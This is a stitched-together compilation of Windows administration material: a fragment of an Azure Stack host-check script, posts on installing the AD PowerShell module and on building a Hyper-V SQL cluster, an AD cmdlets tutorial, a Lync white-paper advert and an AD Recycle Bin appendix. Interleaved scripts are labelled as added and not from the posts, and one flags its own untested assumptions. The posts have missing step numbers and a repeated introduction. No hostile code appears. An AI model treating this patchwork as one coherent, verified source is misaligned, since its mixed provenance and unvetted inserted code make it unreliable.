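        [pscustomobject]@{ Check = 'KB 3124262 installed';                 Pass = [bool](Get-HotFix -Id KB3124262 -ErrorAction SilentlyContinue); Value = 'Get-HotFix' }
        [pscustomobject]@{ Check = 'Not domain joined';                    Pass = (-not $cs.PartOfDomain); Value = $cs.Domain }
        [pscustomobject]@{ Check = 'Dual socket, >= 12 physical cores';    Pass = ($cpu.Count -eq 2 -and $cores -ge 12); Value = "$($cpu.Count) sockets, $cores cores" }
        [pscustomobject]@{ Check = '>= 96 GB RAM';                         Pass = ($cs.TotalPhysicalMemory -ge 96GB); Value = ('{0:N0} GB' -f ($cs.TotalPhysicalMemory / 1GB)) }
        [pscustomobject]@{ Check = 'Virtualization + SLAT in firmware';    Pass = $slatOk; Value = '(see note on running hypervisors)' }
        [pscustomobject]@{ Check = '>= 4 data disks';                      Pass = ($dataDisks.Count -ge 4); Value = $dataDisks.Count }
        [pscustomobject]@{ Check = 'Each data disk >= 140 GB';             Pass = (@($dataDisks | Where-Object { $_.Size -lt 140GB }).Count -eq 0); Value = (($dataDisks | ForEach-Object { '{0:N0}' -f ($_.Size / 1GB) }) -join ', ') }
        [pscustomobject]@{ Check = 'Single bus type (SAS or SATA)';        Pass = ($busTypes.Count -le 1); Value = ($busTypes -join ', ') }
    )
}

Test-AzureStackPocHost | Format-Table -AutoSize
```

A failed "Each data disk" or "Single bus type" row is the one to fix before anything else: the deployment builds its storage pool from those disks, and a mixed or undersized set is not something you can correct after the fact.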

How to Install the Active Directory Module for Windows PowerShell

With the release of PowerShell 2.0, we now have a PowerShell module that we can use to administer Active Directory. The Active Directory Module for Windows PowerShell runs on Windows Server 2008 R2 and on Windows 7 and relies on a web service that is hosted on one or more domain controllers in your environment. In this post I’ll go over what you need in order to install and use the Active Directory Module for PowerShell, also known as AD PowerShell.

Setting up your Domain Controllers

In order to use the Active Directory Module for Windows PowerShell on 2008 R2 and Windows 7, you first need to be running Active Directory Web Services (ADWS) on at least one Domain Controller. To install Active Directory Web Services (ADWS) you’ll need one of the following:
1. Windows Server 2008 R2 AD DS
You can load Active Directory Web Services (ADWS) on a Windows Server 2008 R2 Domain Controller when you install the AD DS role. The AD PowerShell module will also be installed during this process. Active Directory Web Services (ADWS) will be enabled when you promote the server to a DC using DCPromo.
2. Active Directory Management Gateway Service
If you cannot run Windows Server 2008 R2 Domain Controllers, you can install the Active Directory Management Gateway Service. Installing this will allow you to run the same Active Directory web service that runs on Windows Server 2008 R2 DC’s. You can download the Active Directory Management Gateway Service here. Make sure you read the instructions carefully; there are several hotfixes that need to be applied depending on the version of Windows you are running. You can install the Active Directory Management Gateway Service on DC’s running the following operating systems:
  • Windows Server 2003 R2 with Service Pack 2
  • Windows Server 2003 SP2
  • Windows Server 2008
  • Windows Server 2008 SP2
Note: You can also use AD PowerShell to manage AD LDS instances on Windows Server 2008 R2. If you plan on using AD LDS, Active Directory Web Services will be installed with the AD LDS role, and the AD PowerShell module will also be installed during this process. The ADWS service will be enabled when your LDS instance is created.
Once you’ve got Active Directory web services up and running on your Domain Controller(s), you’ll notice you now have an ADWS service as shown here:
At this point, you should be ready to install the AD PowerShell module. You can run AD PowerShell on all versions of Windows Server 2008 R2 (except the Web Edition) and on Windows 7.

Installing the Active Directory Module for Windows PowerShell on 2008 R2 member servers

You can install the Active Directory Module on Windows 2008 R2 member servers by adding the RSAT-AD-PowerShell feature using the Server Manager. I usually use the ServerManager module to do this because it is quick and easy. To install the feature using the ServerManager module, launch PowerShell and run the following commands:
Import-Module ServerManager
Add-WindowsFeature RSAT-AD-PowerShell
Remember, this only needs to be done on Windows Server 2008 R2 member servers. The RSAT-AD-PowerShell feature will be added to 2008 R2 DC’s during the DCPromo process.

Installing the Remote Server Administration Tools (RSAT) feature on Windows 7

In order to install the Active Directory Module for Windows PowerShell you need to download the RSAT tools for Windows 7 here. Once this is installed you are still not finished; you need to enable the Active Directory module. Navigate to Control Panel > Programs and Features > Turn Windows Features On or Off and select Active Directory Module for Windows PowerShell as shown here:
Once you have Active Directory web services running on at least one domain controller and the AD PowerShell module is installed, you are ready to run the AD PowerShell module. You can do this in one of two ways. First, you can access the “Active Directory Module for Windows PowerShell” shortcut in Administrative Tools as shown here:
Right click the shortcut and select “Run as administrator” in order to start PowerShell with elevated permissions.
You can also simply import the AD PowerShell module in your existing PowerShell session. Just use the Import-Module ActiveDirectory command:
Import-Module ActiveDirectory
That’s all that needs to be done to get up and running. I will get into using the AD PowerShell cmdlets in future posts, so keep an eye out for that.
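The following is an added example, not from the post, that checks the three prerequisites the post describes before you start troubleshooting the module: the module is installed locally, a domain controller advertises ADWS, and TCP port 9389 (the port ADWS listens on) is reachable from this host. It assumes you are on a domain-joined machine; the function name is illustrative.

```powershell
# Added example (not from the post): verify AD PowerShell prerequisites end to end.
function Test-AdPowerShellPrerequisites {
    $result = [ordered]@{}
    $result.ModuleInstalled = [bool](Get-Module -ListAvailable -Name ActiveDirectory)
    if (-not $result.ModuleInstalled) {
        $result.Advice = 'Install the module: Add-WindowsFeature RSAT-AD-PowerShell on a server, the RSAT package on a client.'
        return [pscustomobject]$result
    }
    Import-Module ActiveDirectory
    # -Discover uses the DC locator (not ADWS itself); -Service ADWS asks for a DC that
    # has registered the ADWS service, so this works even when the cmdlets otherwise fail
    $dc = Get-ADDomainController -Discover -Service ADWS -ErrorAction SilentlyContinue
    $result.AdwsDC = if ($dc) { [string]$dc.HostName } else { $null }
    $result.Port9389Open = $false
    if ($dc) {
        # ADWS listens on TCP 9389; a plain socket connect is enough to prove the path is open
        $tcp = New-Object System.Net.Sockets.TcpClient
        try   { $tcp.Connect($result.AdwsDC, 9389); $result.Port9389Open = $tcp.Connected }
        catch { $result.Port9389Open = $false }
        finally { $tcp.Close() }
    }
    $result.Advice = if (-not $dc) {
        'No DC advertises ADWS: install AD DS on 2008 R2 or the AD Management Gateway Service on older DCs.'
    } elseif (-not $result.Port9389Open) {
        "ADWS DC $($result.AdwsDC) found but TCP 9389 is blocked: check firewalls between this host and the DC."
    } else {
        "Ready: the AD cmdlets can use $($result.AdwsDC)."
    }
    [pscustomobject]$result
}

Test-AdPowerShellPrerequisites
```

Running this from the machine that will use the module is the point: the common failure is not a missing service but a firewall that allows LDAP (389) and Kerberos (88) to the DC while dropping 9389.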

Creating an Active/Active SQL Cluster using Hyper-V: Part1 Virtualized Storage

10 Apr 2012 3:07 PM 


In this series of posts I will walk you through the process of creating an Active/Active SQL Server cluster using Hyper-V and the Microsoft iSCSI Software Target as a virtualized SAN. The goal is first to create a storage server hosted on a normal Windows 2008 R2 server, then connect to this server from two other machines acting as iSCSI initiators. Then I will create the Windows cluster along with the clustered DTC service. A clustered SQL Server instance will then be created. Finally another clustered SQL Server instance will be created and the Active/Active configuration of both instances will be applied.

Solution Architecture

The solution is fairly simple as per the below configuration.


You need to create three virtual machines as illustrated above. One as the AD and storage server and another two as the SQL server nodes that will act as Active/Active nodes.
These are all Windows 2008 R2 servers; we have created the domain and joined all servers to it. You also need to set up two network cards in each machine: one for the normal LAN connection and another for the cluster heartbeat. It would be advisable to separate the storage traffic onto another network as well if you expect heavy usage. The configuration given here is entirely static, with normal local IPs assigned to all network cards.

Virtualized SAN Steps

In this section we will go through the needed steps to create the virtual storage server based SAN.

Configuring the iSCSI Target

1-      Download the required iSCSI target software from
2-      Copy the software to the storage server UK-LIT-AD in this case.
3-      Double click the file to start the installation.
4-      After it completes it will take you to a web page.
5-      Scroll down and click as shown below.
8-      Click Install.
10-   Now open Server Manager and you will find a new tree as shown below.
12-   Give the new target a name (any name will do).
13-   In the initiator list just click Advanced and enter the domain names of all the servers that will have access to this target. In our case this is UK-LIT-DB1 and UK-LIT-DB2.
14-   If it displays a warning about multiple initiators, just accept it.
15-   Click Finish. You have now completed the creation of your iSCSI target; what remains is to add the required virtual disks to it.
17-   Place the new VHD and give it a name.
18-   Choose the disk size.
19-   Click finish and this would create the fixed size disk.
20-   You will need to create the following disks so just follow the same approach
Cluster Quorum
DTC cluster 1 log disk
DTC cluster 2 log disk
SQL cluster 1 shared disk
SQL cluster 2 shared disk

Configuring the iSCSI Initiators

Now we will configure the two SQL nodes to be able to access these disks.
1-      Log on to the first node UK-LIT-SQL1
2-      Open the iSCSI Initiator.
3-      Change the initiator name to match the machine name.
4-      In the Discovery tab add a new discovery portal using the IP of the storage server.
5-      Click on the Targets tab and click Refresh to show the available targets.
6-      Click Connect, then OK.
7-      Go to the Volumes and Devices tab and click Auto Configure.
8-      Do the same steps on UK-LIT-SQL2 starting at step 1 above, but change the initiator name to match that machine name as shown below.
9-      Go to any node of the two and open the server manager and then the disk management.
10-   Bring all disks online to this node and then prepare them with primary partitions and format those using NTFS.
In the next parts I will show you how to configure the Active/Active SQL cluster.

Creating an Active/Active SQL Cluster using Hyper-V: Part2 the Clustered Instances

In part 1 of this series I showed you how to configure the virtual storage required for the cluster. In this part I will show you how to create the SQL cluster as an Active/Passive cluster and in the next part I will show how to convert it to an Active/Active cluster.


In this series of posts I will walk you through the process of creating an Active/Active SQL Server cluster using Hyper-V and the Microsoft iSCSI Target software as a virtualized SAN. The plan is to first create a storage server hosted on an ordinary Windows 2008 R2 server, then connect two other machines to it as iSCSI initiators. I will then create the Windows cluster along with the clustered DTC service. A clustered SQL Server instance will then be created. Finally, a second clustered SQL Server instance will be created and the Active/Active configuration of both instances will be applied.

Solution Architecture

The solution is fairly simple as per the below configuration.

Windows Cluster Configuration Steps

Now that we have configured the storage we can start the Windows failover cluster configuration.
1- Install the Windows Failover Clustering feature on both nodes from the Add Features wizard.
2- Bring all shared storage online on the current node.
3- Open the cluster management console and click Create Cluster. Note that at this stage it is preferable to disable all disks on the iSCSI target except the disk that will be used as the quorum.
4- On the Select Servers page, click Browse and select the two nodes.
5- Perform the cluster validation by choosing the option to run the cluster validation wizard.
6- Select all tests.
7- Review the validation report and make sure there are no validation errors.
8- Back in the Create Cluster wizard, give the new cluster a name and an unused IP address.
9- The cluster is created, and the first disk assigned to the first LUN is treated as the quorum disk of the cluster.
10- If you disabled all disks except the quorum disk on the iSCSI target, you will need to add each of them to the cluster as new storage when it is needed. It is advisable to add each disk only when you need it.
11- Enable the first disk that will be used for the first clustered DTC.
12- In the cluster management console, add the new storage.
13- Go to the Services and Applications node, click Configure a Service or Application, select the DTC service and then click Next.
14- You can change the resource name if you want, but you have to give it an unused IP address.
15- Select the disk.
16- Click Finish on the confirmation screen.
17- Now the Windows cluster is prepared, with a DTC instance, and ready for the SQL Server installation.
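The cluster-creation steps above, scripted with the FailoverClusters module that ships with Windows Server 2008 R2, as an added example that is not part of the original post. The node names come from the post; the cluster name, the DTC access point name and both IP addresses are constructed placeholders, PowerShell remoting is assumed to be enabled on both nodes, and the DTC resource type name and dependency wiring are my assumptions to verify against Get-ClusterResourceType before running.

```powershell
Import-Module ServerManager
Import-Module FailoverClusters

$nodes       = 'UK-LIT-SQL1', 'UK-LIT-SQL2'   # node names from the post
$clusterName = 'UK-LIT-CLUSTER'                # assumed cluster name
$clusterIP   = '192.168.10.50'                 # assumed unused address
$dtcName     = 'UK-LIT-DTC1'                   # assumed DTC client access point name
$dtcIP       = '192.168.10.51'                 # assumed unused address

# Step 1: install the feature on both nodes (assumes PowerShell remoting is enabled;
# otherwise run Add-WindowsFeature Failover-Clustering locally on each node).
Invoke-Command -ComputerName $nodes -ScriptBlock {
    Import-Module ServerManager
    Add-WindowsFeature Failover-Clustering
}

# Steps 5-7: run the full validation suite. Test-Cluster writes an .mht report;
# read it and fix every reported error before creating the cluster.
$report = Test-Cluster -Node $nodes
Write-Host "Validation report: $($report.FullName)"

# Steps 8-9: create the cluster. With only the quorum LUN exposed by the iSCSI
# target at this point, that disk is the one picked up as the witness disk.
New-Cluster -Name $clusterName -Node $nodes -StaticAddress $clusterIP
Get-ClusterQuorum -Cluster $clusterName      # confirm which disk became the quorum

# Steps 11-12: after enabling the DTC log disk on the iSCSI target, add it to the
# cluster and keep the returned resource so the role can reference it by name.
$dtcDisk = Get-ClusterAvailableDisk -Cluster $clusterName | Add-ClusterDisk

# Steps 13-16: a clustered DTC is a client access point (name + IP), the disk, and a
# DTC resource that depends on both. Resource type name assumed; see lead-in.
Add-ClusterServerRole -Cluster $clusterName -Name $dtcName `
    -Storage $dtcDisk.Name -StaticAddress $dtcIP
$dtc = Add-ClusterResource -Cluster $clusterName -Name "$dtcName MSDTC" `
    -Group $dtcName -ResourceType 'Distributed Transaction Coordinator'
Add-ClusterResourceDependency -Cluster $clusterName -Resource $dtc.Name -Provider $dtcName
Add-ClusterResourceDependency -Cluster $clusterName -Resource $dtc.Name -Provider $dtcDisk.Name
Start-ClusterGroup -Cluster $clusterName -Name $dtcName
```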

SQL Server First Cluster Instance

1- Go to the iSCSI target and create or add the shared disk to be used by the SQL cluster.
2- Open the SQL Server setup and click New SQL Server failover cluster installation.
3- Go through the normal setup process.
5- Enter the SQL cluster name and leave it as the default instance (or name the instance if you require).
Please note that if you are using any virtualization technology other than Hyper-V and have installed the guest additions, you will need to uninstall these additions and restart the servers; otherwise the above step will fail and report that it cannot validate the above settings.
13- This completes the installation of the first SQL cluster on the first node.
14- Log on to the second SQL node, start the SQL Server setup and choose to add a node to a failover cluster.
19- That completes setting up the second node for this SQL cluster.

SQL Server Second Cluster Instance

Now we will go through the installation of a second clustered SQL instance, to be configured later as another active instance on the passive node.
1- Go to the iSCSI target and create or add another shared disk to be used by the second SQL cluster.
2- Go to one of the nodes, open the iSCSI initiator and click Auto Configure again in Volumes and Devices.
3- Now open the Disk Management utility, create the active partition on this disk and format it using NTFS.
4- Open the Windows cluster management console and add this disk to the cluster.
5- Open the SQL Server setup and click New SQL Server failover cluster installation.
6- Go through the normal setup process.
8- Enter the SQL cluster name and the instance name, BCInst.
Please note that if you are using any virtualization technology other than Hyper-V and have installed the guest additions, you will need to uninstall these additions and restart the servers; otherwise the above step will fail and report that it cannot validate the above settings.
10- Choose the disk already added to the cluster.
11- Choose a unique IP address for this cluster.
16- This completes the installation of the second SQL cluster on the first node.
17- Log on to the second SQL node, start the SQL Server setup and choose to add a node to a failover cluster.
19- Choose the new cluster, BCInst.
22- That completes setting up the second node for this SQL cluster.
In the next part I will show you how to configure the two SQL instances in an Active/Active configuration.

Essential PowerShell Cmdlets for Managing Active Directory

Active Directory and PowerShell together offer the system administrator a powerful set of cmdlets to manage and automate standard domain-related tasks.
Every company from the smallest proprietorship to the largest enterprise has Windows servers that use Active Directory (AD). Active Directory domains are security domains used for user authentication, for permitting access to network resources, and for tracking various network resources through the integrated domain naming system (DNS) service.
PowerShell’s AD module allows you to query AD resources, add, remove, and change resources, and to work with user accounts, policies, and objects.
The setup used for this article is a Windows 7 Enterprise system with PowerShell 4.0 installed and a pair of fully updated and patched Windows Server 2008 R2 domain controllers running at the Windows 2008 R2 domain functional level. The two domain controllers are VMware virtual machines.
Domain Controllers: SERVER1, SERVER2
Domain: MW.LOCAL
Domain Level: Windows 2008 R2
Standard PowerShell AD management takes place on a system that’s within the domain. That is to say, if you manage an AD domain, you’ll need to do so from a system (workstation or server) that’s a member of the domain you want to manage. This is not a strict requirement; however, managing a domain outside of your “home” domain is a bit clumsy and can be confusing. Domain trust relationships make managing “foreign” domains easier. That said, this article also shows you how to connect to “foreign” domains, because in large enterprise environments you will need to do so.

Installing the Active Directory Module for PowerShell

Before attempting to install the Active Directory module, check to see if it’s already available to you by entering the following cmdlet:

PS C:\> Get-Module -ListAvailable

    Figure 1: Obtaining a list of available modules.

As you can see, this system already has the AD module available for import. If the AD module isn’t listed, you’ll have to install it via Control Panel -> Add/Remove Programs -> Turn Windows features on or off. The module should be listed under the Remote Server Administration Tools (RSAT) list. Select it, click OK, and allow the installation to proceed.

If you do not find the module listed, you’ll have to download the Windows Management Framework 4.0 at, or download the RSAT at here.

After installation and reboot, reopen PowerShell and import the Active Directory module.

PS C:\> Import-Module ActiveDirectory

The only response you’ll see from the system is shown in Figure 2 below. This progress indicator shows that you are importing the Active Directory module. Once complete, you have access to 76 Active Directory cmdlets; 22 of them are Get cmdlets.
    Figure 2: Loading the Active Directory module into PowerShell.

Exploring Your Active Directory Environment

PowerShell’s “Get” cmdlets are a safe bet for exploring your Active Directory setup. The “Get” cmdlets don’t change anything in AD, nor do they disrupt any workflows by locking records. These cmdlets are the equivalent of using the SELECT keyword in standard SQL, so don’t worry that they induce any significant stress on your AD database or domain controllers. You’ll find the complete list of AD cmdlets on Microsoft’s Windows Server site at

The first cmdlet to begin our exploration process is Get-ADDomain. Get-ADDomain provides you with a list of information about your domain that you’ll find valuable as you discover your domain and its resources. See Figure 3 below.

PS C:\> Get-ADDomain

    Figure 3: Exploring AD domain information via Get-ADDomain.
As you can see in Figure 3, this simple cmdlet provides a wealth of detail including:
  • Infrastructure Master Server Name (SERVER1)
  • Domain Mode (Windows 2008 R2)
  • Domain SID
  • Domain Name (MW)
  • Domain NETBIOS Name (MW)
Querying AD for the existence of a particular user is a common practice and one that works perfectly at the command line. This query yields useful information about the user, if the user exists in AD.

PS C:\> Get-ADUser khess

     Figure 4: Querying AD for the existence of a user (khess).

If you don’t know the user’s account name, you can query the AD database in a more general way to find out if the user exists.

PS C:\> Get-ADUser -Filter {Surname -eq "Hess"}

     Figure 5: Querying AD for a user’s surname.

You know that Surname is a good identifier to search on because it is part of the user record as shown in Figure 4 above. You can query AD using any of the identifiers listed. For example, you can use a user’s given name, if you aren’t sure of his or her surname.

PS C:\> Get-ADUser -Filter {GivenName -eq "Ken"}

    Figure 6: Querying AD using a user’s given name.

This basic information will help you locate a user, if he or she exists in AD, but it doesn’t tell you anything about the user’s group memberships. For example, if a user is only supposed to be in the Domain Users group, the default for all domain users, but also has group membership in an Administrator group, you might never know until you query for that information.

PS C:\> Get-ADPrincipalGroupMembership -Identity khess

    Figure 7: Finding out to which groups a user belongs.

As Figure 7 shows, user khess belongs to Domain Users, Administrators, and Domain Admins.

You find that user khess isn’t authorized to be a member of the Domain Admins group. You can revoke his membership to this group with the Remove-ADGroupMember cmdlet.

PS C:\> Remove-ADGroupMember -Identity "Domain Admins" -Members "khess"

The system prompts you to agree that you want to take this action. Press Enter at the prompt to accept the default answer, which is “Yes.”

To verify that you’ve successfully removed the user from the Domain Admins group, query AD for the user’s principal group membership again.

PS C:\> Get-ADPrincipalGroupMembership -Identity khess

Figure 8 shows the results of the two cmdlets.
    Figure 8: Removing a user from the Domain Admins security group.
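The group-membership check and removal just shown, turned into a repeatable audit of the privileged groups against an approved member list, as an added example that is not from the original article. The group list, the approved accounts and the use of Get-ADGroupMember (rather than the per-user Get-ADPrincipalGroupMembership) are my choices.

```powershell
Import-Module ActiveDirectory

function Get-UnapprovedPrivilegedMembers {
    param(
        [string[]]$PrivilegedGroups = @('Domain Admins', 'Administrators', 'Enterprise Admins'),
        # Approved SamAccountNames per group (assumed list); anyone else is reported
        [hashtable]$Approved = @{
            'Domain Admins'     = @('Administrator')
            'Administrators'    = @('Administrator')
            'Enterprise Admins' = @('Administrator')
        }
    )
    foreach ($group in $PrivilegedGroups) {
        # Direct members can be removed from this group; -Recursive also surfaces users
        # that arrive through a nested group, which must be fixed in that nested group
        $direct = Get-ADGroupMember -Identity $group | Select-Object -ExpandProperty SamAccountName
        $all    = Get-ADGroupMember -Identity $group -Recursive |
                  Where-Object { $_.objectClass -eq 'user' }
        foreach ($m in $all) {
            if ($Approved[$group] -notcontains $m.SamAccountName) {
                New-Object PSObject -Property @{
                    Group             = $group
                    SamAccountName    = $m.SamAccountName
                    DirectMember      = [bool]($direct -contains $m.SamAccountName)
                    DistinguishedName = $m.distinguishedName
                }
            }
        }
    }
}

# 1. Report: read-only, like the Get cmdlets discussed above
$findings = Get-UnapprovedPrivilegedMembers
$findings | Format-Table Group, SamAccountName, DirectMember -AutoSize

# 2. Remediate direct memberships after review. -WhatIf previews; drop it to act.
foreach ($f in ($findings | Where-Object { $_.DirectMember })) {
    Remove-ADGroupMember -Identity $f.Group -Members $f.SamAccountName -Confirm:$false -WhatIf
}
```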

Working with Users and User Accounts

Creating new user accounts is one of the tasks that junior-level administrators receive as part of their standard duties. PowerShell’s AD cmdlets take some of the pain out of creating them, although there is no known process for creating user accounts that is 100-percent painless. To create a new user account via PowerShell, you need to know two essential pieces of information: the correct spelling of the user’s name and the account name assigned to the user.

PS C:\> New-ADUser -Name "Abby Jones" -GivenName Abby -Surname Jones -UserPrincipalName ajones@mw.local -SamAccountName ajones

The cmdlet returns no information to you. Use the Get-ADUser cmdlet to confirm the account’s creation. See Figure 9 for details.

PS C:\> Get-ADUser ajones

    Figure 9: Creating a new user account.

Note that all AD accounts created via PowerShell are disabled by default unless you supply a password when you create the account. You will have to give the account a password and enable the account before the user can log on the first time. It’s easier to enable the account and supply a password at account creation, but some company policies require that new accounts remain disabled until the user has been assigned a computer.

One method of creating an enabled, password protected user account is to allow the script to ask you for a password, using the prompt supplied in the cmdlet (Password), as shown.

PS C:\> New-ADUser -Name "Abby Jones" -GivenName Abby -Surname Jones -UserPrincipalName ajones@mw.local -SamAccountName ajones -Enabled $true -AccountPassword (Read-Host -AsSecureString "Password")

Password: *********

To see a list of disabled accounts in the domain, use the Search-ADAccount cmdlet. See Figure 10.

PS C:\> Search-ADAccount -AccountDisabled -UsersOnly | FT Name

    Figure 10: Listing the domain’s disabled accounts.

If you don’t specify “Enabled” and a password when you create the account, you’ll have to supply an initial password and enable the account as a two-step process.

First, change the user’s password from no password to the new password. Both passwords are read from keyboard input for security reasons. Since the user doesn’t have an old password, press ENTER when prompted for it.

PS C:\> Set-ADAccountPassword -Identity ajones -NewPassword (Read-Host -AsSecureString "New Password") -OldPassword (Read-Host -AsSecureString "Old Password")

New Password: ********
Old Password:

There’s no response from the system.

Enable the disabled account using the Enable-ADAccount cmdlet.

PS C:\> Enable-ADAccount -Identity ajones

You’re returned to the PowerShell prompt with no response. You can confirm that you successfully enabled the account.

PS C:\> Search-ADAccount -AccountDisabled -UsersOnly | FT Name

The user’s name no longer appears in the list of disabled accounts.

As a System Administrator, you know that users sometimes lock themselves out of the domain by typing in a password incorrectly enough times that they exceed the maximum number of attempts and lockout occurs. Unlocking user accounts doesn’t have to be a stressful experience for you or the user, who’s locked himself or herself out of the domain. To unlock the user’s account, you need to have the user’s logon name, for example, khess.

You should first check to confirm that the user’s account is locked out.

PS C:\> Search-ADAccount -LockedOut -UsersOnly | FT Name

Ken Hess

You find that the account is locked out. To unlock the account, issue the following cmdlet:

PS C:\> Unlock-ADAccount -Identity khess

The account is now unlocked and the user may log on.

To make the cmdlet interactive and useful to perform repeated unlocks, use the following cmdlet and save it as Unlock-Account.ps1.

PS C:\> Unlock-ADAccount -Identity (Read-Host "Username")

You can run the script in PowerShell and it will prompt you for the user’s name and unlock the account.

Removing a user account is so easy to do that you should first disable the account. Disabling an account will render it useless unless another Administrator unlocks it, but it gives you time to verify that the user account should be removed from AD.

To disable a user account, use

PS C:\> Disable-ADAccount -Identity ajones

The system returns you to the PowerShell prompt with no response.

When you’re sure that the user account is ready for removal, use the Remove-ADUser cmdlet and answer the confirmation prompt.

PS C:\> Remove-ADUser ajones

    Figure 11: Removing a user account from Active Directory.
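The disable-first, remove-later sequence described above as one two-stage function, added here as an example that is not from the original article. The account name ajones is the article's; the 30-day grace period, the Description stamp used to record when and by whom the account was disabled, and the stripping of group memberships at disable time are my assumptions.

```powershell
Import-Module ActiveDirectory

function Invoke-UserOffboarding {
    [CmdletBinding(SupportsShouldProcess=$true)]
    param(
        [Parameter(Mandatory=$true)][string]$Identity,
        [int]$GraceDays = 30,      # assumed retention before the object is removed
        [switch]$Remove
    )
    $user = Get-ADUser -Identity $Identity -Properties Enabled, Description, MemberOf

    if ($user.Enabled) {
        # Stage 1: disable, drop group memberships (the primary group is not in MemberOf),
        # and record date and operator so the removal stage can check the grace period.
        if ($PSCmdlet.ShouldProcess($user.SamAccountName, 'Disable and stage for removal')) {
            Disable-ADAccount -Identity $user
            foreach ($g in $user.MemberOf) {
                Remove-ADGroupMember -Identity $g -Members $user -Confirm:$false
            }
            $stamp = 'Disabled {0} by {1}\{2}; remove after {3} days' -f `
                (Get-Date -Format 'yyyy-MM-dd'), $env:USERDOMAIN, $env:USERNAME, $GraceDays
            Set-ADUser -Identity $user -Description $stamp
        }
        return "Staged $($user.SamAccountName) for removal"
    }

    # Stage 2: remove only when asked to, and only once the recorded grace period is over.
    if (-not $Remove) {
        return "$($user.SamAccountName) is already disabled; rerun with -Remove after the grace period"
    }
    if ($user.Description -notmatch 'Disabled (\d{4}-\d{2}-\d{2})') {
        return "$($user.SamAccountName) was not disabled by this process; review before removing"
    }
    $disabledOn = [datetime]::ParseExact($Matches[1], 'yyyy-MM-dd', $null)
    $removeOn   = $disabledOn.AddDays($GraceDays)
    if ((Get-Date) -lt $removeOn) {
        return "Grace period for $($user.SamAccountName) ends $($removeOn.ToShortDateString())"
    }
    if ($PSCmdlet.ShouldProcess($user.SamAccountName, 'Remove-ADUser')) {
        Remove-ADUser -Identity $user -Confirm:$false
    }
    return "Removed $($user.SamAccountName)"
}

Invoke-UserOffboarding -Identity ajones -WhatIf            # stage 1 preview
Invoke-UserOffboarding -Identity ajones -Remove -WhatIf    # stage 2 preview
```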

Working with Remote Domains

Near the beginning of this article, I told you that connecting to domains outside of your home domain can be done but it’s a bit clumsy. It is clumsy, but it can be done. The one thing that you have to remember is that you have to supply credentials for the remote domain for each cmdlet that you issue against it, otherwise your cmdlets operate on your home domain or will fail because you’re referencing resources unknown to your home domain.

For the purposes of this part of the article, MW.LOCAL is the remote, non-trusted domain. It is not my home domain and therefore I have to issue credentials for each command. For example, to look at the domain’s general information, use:

PS C:\> Get-ADDomain "MW.LOCAL" -Server "SERVER1" -Credential "MW.LOCAL\Administrator"

When you enter this cmdlet, you’ll receive a domain password prompt for the Administrator account as shown in Figure 12.
    Figure 12: Entering the Administrator password for the MW.LOCAL domain.

Once your credentials are accepted, the cmdlet executes against the remote domain and you receive your response as expected. See Figure 13.
    Figure 13: Displaying Get-ADDomain results from a remote domain.

If you recall the simple, Get-ADUser khess cmdlet, the response displays information about the user’s account in the domain as shown in Figure 4.

The same cmdlet to query a remote domain requires a bit more information.

PS C:\> Get-ADUser khess -Server "SERVER1" -Credential "MW.LOCAL\Administrator"

Executing this cmdlet opens a password prompt for the MW.LOCAL domain. After authentication, you receive the response. See Figure 14.
    Figure 14: Displaying Get-ADUser results from a remote domain.
Note that PowerShell doesn’t cache your credentials. You’ll have to enter them each time you execute cmdlets against a remote domain in which you have authority.
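Since PowerShell does not cache the remote-domain credentials, the usual alternative to retyping the password per cmdlet is to capture them once and let $PSDefaultParameterValues supply -Server and -Credential to the AD cmdlets for the rest of the session. This is an added example, not from the original article; the domain, server and account are the article's, the wildcard scoping to *-AD* cmdlets is my choice.

```powershell
Import-Module ActiveDirectory

# Prompt once; the password stays inside the PSCredential as a SecureString.
$mwCred = Get-Credential -UserName 'MW.LOCAL\Administrator' -Message 'MW.LOCAL credentials'

# Defaults apply only to AD-module cmdlets, so cmdlets against the home domain
# and everything else in the session are unaffected.
$PSDefaultParameterValues['*-AD*:Server']     = 'SERVER1'
$PSDefaultParameterValues['*-AD*:Credential'] = $mwCred

# The same queries as above, now without a password prompt each time.
Get-ADDomain 'MW.LOCAL'
Get-ADUser khess
Get-ADPrincipalGroupMembership -Identity khess

# Clear the defaults and the credential when finished with the remote domain.
$PSDefaultParameterValues.Remove('*-AD*:Server')
$PSDefaultParameterValues.Remove('*-AD*:Credential')
Remove-Variable mwCred
```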

There are other interesting cmdlets in the Active Directory module, such as those that add computer and service accounts, create new organizational units, set password expiration, and move objects from one container to another or to a new domain.

In this brief introduction to PowerShell’s Active Directory module, you’ve learned to work with user accounts, to gather information about the domain, to examine user properties, to check group membership, to enter information into interactive cmdlets, and to connect to remote domains. The Active Directory PowerShell module offers System Administrators new opportunities for automating repetitive tasks and for streamlining domain activities.

Best practices for monitoring Microsoft Lync performance

We all know about the complexity of Microsoft Lync which is dependent on multiple infrastructure components, including the network. This can make it extremely difficult and time-consuming to find and resolve performance and availability issues.

When Lync services falter or fail, users experience a reduced ability to communicate, collaborate and work productively, making it imperative that IT resolve Lync issues quickly.

We have found that an application performance monitoring (APM) solution that provides visibility into all an application’s components and dependencies can quickly overcome this impasse. Targeted, real-time monitoring immediately sends administrators down the correct diagnostic path to the root cause.

This white paper from Ipswitch discusses problems with Lync performance and availability, and illustrates specifically how a superior application performance monitoring solution integrates with network management tools to give IT the visibility it needs to rapidly resolve Lync issues.

An APM solution can help ensure maximum performance and availability for all Lync services by enabling IT to:

· Monitor all Lync’s key components, including the front end server, mediation server and edge server

· Monitor the performance of both Lync and heterogeneous networks from a single, unified console

· Automate common repairs and other tasks with PowerShell scripting

· Conveniently generate built-in reports to plan improvements, justify investments and keep the business informed

· Easily tailor out-of-the-box profiles for deployment specific Lync components and dependencies

Register now and download this brand new white paper from Ipswitch and find out how an APM solution can streamline the resolution of problems with Lync performance and availability.

Download Here:


Appendix A: Additional Active Directory Recycle Bin Tasks


Updated: February 20, 2012
Applies To: Windows Server 2008 R2

In addition to recovering a single deleted Active Directory object, there are several additional tasks that you can perform with Active Directory Recycle Bin in Windows Server 2008 R2:

Depending on your system environment and business practices, you can increase or decrease the deleted object lifetime and the tombstone lifetime. If you want your deleted objects to be recoverable for longer than the default 180 days, you can increase the deleted object lifetime. If you want your recycled objects to be recoverable (through authoritative restore) for longer than the default 180 days, you can also increase the tombstone lifetime.

